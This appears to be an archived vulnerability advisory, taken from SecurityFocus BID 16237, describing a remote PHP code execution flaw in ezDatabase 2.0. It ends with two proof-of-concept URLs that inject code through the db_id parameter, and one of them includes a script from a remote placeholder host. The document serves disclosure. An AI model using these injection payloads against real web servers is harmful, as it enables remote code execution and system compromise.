10 lines
No EOL
631 B
Text
10 lines
No EOL
631 B
Text
source: https://www.securityfocus.com/bid/16237/info
|
|
|
|
ezDatabase is prone to a remote PHP script code execution vulnerability.
|
|
|
|
An attacker can exploit this issue to execute arbitrary malicious PHP code and execute it in the context of the Web server process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.
|
|
|
|
ezDatabase version 2.0 is vulnerable to these issues; other versions may also be affected.
|
|
|
|
http://www.example.com/visitorupload.php?db_id=;phpinfo()
|
|
http://www.example.com/visitorupload.php?db_id=;include(_GET[test])&test=http://www.example2.com/script.php |